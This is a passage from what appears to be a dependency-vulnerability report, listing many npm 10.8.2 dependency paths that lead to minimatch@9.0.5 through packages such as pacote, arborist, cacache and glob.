  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-packlist@8.0.2 + + ignore-walk@6.0.5 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + npm-packlist@8.0.2 + + ignore-walk@6.0.5 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + npm-packlist@8.0.2 + + ignore-walk@6.0.5 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + npm-packlist@8.0.2 + + ignore-walk@6.0.5 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmaccess@8.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmhook@10.0.5 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmorg@6.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpublish@9.0.9 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmsearch@7.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmteam@6.0.5 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + npm-profile@10.0.0 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-packlist@8.0.2 + + ignore-walk@6.0.5 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-packlist@8.0.2 + + ignore-walk@6.0.5 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-packlist@8.0.2 + + ignore-walk@6.0.5 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-packlist@8.0.2 + + ignore-walk@6.0.5 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-packlist@8.0.2 + + ignore-walk@6.0.5 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpublish@9.0.9 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmversion@6.0.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpublish@9.0.9 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-packlist@8.0.2 + + ignore-walk@6.0.5 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-packlist@8.0.2 + + ignore-walk@6.0.5 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-packlist@8.0.2 + + ignore-walk@6.0.5 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-packlist@8.0.2 + + ignore-walk@6.0.5 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpublish@9.0.9 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
